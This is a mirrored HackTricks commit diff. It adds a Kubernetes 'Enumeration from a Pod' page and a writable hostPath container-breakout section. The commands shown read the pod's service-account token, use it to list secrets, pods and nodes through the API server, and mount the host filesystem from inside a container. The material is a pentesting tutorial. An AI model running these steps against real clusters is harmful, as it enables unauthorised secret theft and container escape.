0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [master] 5 pages modified

Browse source
This commit is contained in:
CPol 2021-04-27 23:18:16 +00:00 committed by gitbook-bot
parent f5ddae9e27
commit 9d55f28064
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
4 changed files with 154 additions and 13 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
SUMMARY.md
View file

@ -170,7 +170,8 @@
* [Print Job Retention](pentesting/pentesting-printers/print-job-retention.md)
* [Scanner and Fax](pentesting/pentesting-printers/scanner-and-fax.md)
* [Pentesting SAP](pentesting/pentesting-sap.md)
* [Pentesting Kubernetes](pentesting/pentesting-kubernetes.md)
* [Pentesting Kubernetes](pentesting/pentesting-kubernetes/README.md)
* [Enumeration from a Pod](pentesting/pentesting-kubernetes/enumeration-from-a-pod.md)
* [7/tcp/udp - Pentesting Echo](pentesting/7-tcp-udp-pentesting-echo.md)
* [21 - Pentesting FTP](pentesting/pentesting-ftp/README.md)
* [FTP Bounce attack - Scan](pentesting/pentesting-ftp/ftp-bounce-attack.md)

18
linux-unix/privilege-escalation/docker-breakout.md
View file

@ -470,6 +470,24 @@ capsh --print
#You can abuse the SYS_MODULE capability
```
## Writable hostPath Mount
\(Info from [**here**](https://medium.com/swlh/kubernetes-attack-path-part-2-post-initial-access-1e27aabda36d)\) Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector:
```bash
#### Check if You Can Write to a File-system
$ echo 1 > /proc/sysrq-trigger
#### Check root UUID
$ cat /proc/cmdlineBOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300- Check Underlying Host Filesystem
$ findfs UUID=<UUID Value>/dev/sda1- Attempt to Mount the Host's Filesystem
$ mkdir /mnt-test
$ mount /dev/sda1 /mnt-testmount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now.
#### debugfs (Interactive File System Debugger)
$ debugfs /dev/sda1
```
## Seccomp in Docker
This is not a technique to breakout from a Docker container but a security feature that Docker uses and you should know about as it might prevent you from breaking out from docker:

21
pentesting/pentesting-kubernetes.md → pentesting/pentesting-kubernetes/README.md
View file

@ -29,7 +29,7 @@ Security tips for Kubernetes
* **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application \(so usually, a pod run just 1 container\). The pod is the way kubernetes abstracts the container technology running.
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** \(with a different internal IP\) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service. When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
![](../.gitbook/assets/image%20%28466%29.png)
![](../../.gitbook/assets/image%20%28466%29.png)
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods \(through API server\). The kubelet doesnt manage containers that were not created by Kubernetes.
* **Kube-proxy**: is the service in charge of the communications \(services\) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
@ -155,7 +155,7 @@ kubectl apply -f deployment.yml
Each configuration file has 3 parts: **metadata**, **specification** \(what need to be launch\), **status** \(desired state\).
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
![](../.gitbook/assets/image%20%28458%29.png)
![](../../.gitbook/assets/image%20%28458%29.png)
#### Example of Deployment + Service declared in the same configuration file \(from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml)\)
@ -346,10 +346,14 @@ helm search <keyword>
Helm is also a template engine that allows to generate config files with variables:
![](../.gitbook/assets/image%20%28465%29.png)
![](../../.gitbook/assets/image%20%28465%29.png)
## PART 2 - VULNERABILITIES and some fixes.
### Enumeration inside a Pod
{% page-ref page="enumeration-from-a-pod.md" %}
### Vulnerabilities - kubernetes secrets
A Secret is an object that contains sensitive data such as a password, a token or a key. Such information might otherwise be put in a Pod specification or in an image. Users can create Secrets and the system also creates Secrets. The name of a Secret object must be a valid **DNS subdomain name**.
@ -632,7 +636,7 @@ kubectl get secret test-secret -oyaml
Do not forget to delete de secrets and re-create them again in order to apply the encryption layer.
### Final tips:
#### Final tips:
* Try not to keep secrets in the FS, get them from other places.
* Check out [https://www.vaultproject.io/](https://www.vaultproject.io/) for add more protection to your secrets.
@ -656,14 +660,7 @@ kubectl exec pod -it -- bash
Once inside the container:
```text
root@pod01:/# uname -r
```
If you want to gather information you could use:
```text
strace uname -r
ltrace uname -r
uname -r
```
When the attack achieves discovering the kernel version, he could run exploiting techniques to gather information or escalate into the OS.

125
pentesting/pentesting-kubernetes/enumeration-from-a-pod.md Normal file
View file

@ -0,0 +1,125 @@
# Enumeration from a Pod
## Enumeration
In a situation where you have managed to break into a Kubernetes Pod you could start enumerating the kubernetes environment from within.
Usually in the directory `/run/secrets/kubernetes.io/serviceaccount` or `/var/run/secrets/kubernetes.io/serviceaccount` you can find the files:
* **ca.crt**: It's the ca certificate to check kubernetes communications
* **namespace**: It indicates the current namespace
* **token**: It contains the auth token of the current pod.
To enumerate the environment you can upload the [**kubectl**](https://kubernetes.io/es/docs/tasks/tools/install-kubectl/) binary and use it. Also, using the **token** obtained before you can manually access some endpoints of the **API Server**.
In order to find the the IP of the API service check the environment for a variable called `KUBERNETES_SERVICE_HOST`.
### Get namespaces
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl get namespaces
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/
```
{% endtab %}
{% endtabs %}
### Get Current Privileges
{% tabs %}
{% tab title="kubectl" %}
```bash
./kubectl auth can-i --list #Get privileges in current namespace
./kubectl auth can-i --list -n custnamespace #Get privileves in custnamespace
```
{% endtab %}
{% endtabs %}
### Get secrets
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get secrets
./kubectl get secrets -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/secrets/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/secrets/
```
{% endtab %}
{% endtabs %}
### Get deployments
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get deployments
./kubectl get deployments -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/deployments/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/deployments/
```
{% endtab %}
{% endtabs %}
### Get deployments
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get pods
./kubectl get pods -n custnamespace
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/default/pods/
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/namespaces/custnamespace/pods/
```
{% endtab %}
{% endtabs %}
### Get deployments
{% tabs %}
{% tab title="kubectl" %}
```text
./kubectl get nodes
```
{% endtab %}
{% tab title="API" %}
```bash
curl -v -H "Authorization: Bearer <jwt_token>" \
https://<Kubernetes_API_IP>:<port>/api/v1/nodes/
```
{% endtab %}
{% endtabs %}